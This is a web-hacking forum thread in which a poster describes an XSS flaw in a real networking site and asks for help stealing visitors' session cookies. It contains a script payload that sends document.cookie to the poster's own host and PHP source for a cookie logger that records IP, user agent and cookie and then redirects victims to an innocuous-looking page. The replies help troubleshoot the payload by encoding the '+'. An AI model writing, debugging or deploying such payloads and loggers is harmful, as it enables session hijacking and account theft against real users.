Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

One-Click XSS Cookie Logger

  1. Home
  2. Forum
  3. Web hacking
  4. One-Click XSS Cookie Logger

ghost's Avatar

ghost

0 0

Okay, so.

I've found an XSS vulnerability in a high profile networking site. The url looks something like this:

"http://doesntconcernyou.com/youdontneedtoknow.php?safdasdf=sadfas&blank="

an injection such as the following after the "blank" variable works: markup<script>window.location="http://www.goatse.cz";</script>

however, I don't merely want to send people to goatse. I'd like to grab their cookies. So when I attempt to craft a url to send them to my logging hub, like so:

markup<script>window.location="http://mysite.com/victimsite/oneclick/index.php?c00kie="+document.cookie;</script>

the injection does not work. any idea as to what I could be doing wrong? here's the source to the logger:


$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$cookie = stripslashes( $_GET['c00kie'] );

$string = $ip . "\n" . $user_agent . "\n" . $referer . "\n" . $cookie;

$fp = fopen('log.txt', 'a');
fwrite($fp, $string . "\n\n");
fclose($fp);

Header ("Location: http://victimsite.com/nonsuspiciouslookingpage");

?>```

spyware's Avatar

spyware

Banned
0 0

Does the "+" get filtered maybe?


ghost's Avatar

ghost

0 0

hm, perhaps, let me try encoding it.


ghost's Avatar

ghost

0 0

aha! that kinda works. I'm getting a part of the cookie.


spyware's Avatar

spyware

Banned
0 0

lesserlightsofheaven wrote: aha! that kinda works. I'm getting a part of the cookie.

What part are you NOT getting?


ghost's Avatar

ghost

0 0

all the juicy bits, sadly =P.

one part of the cookie contains the IP, another the location, and the next two are long hashed values.

all I get is the IP.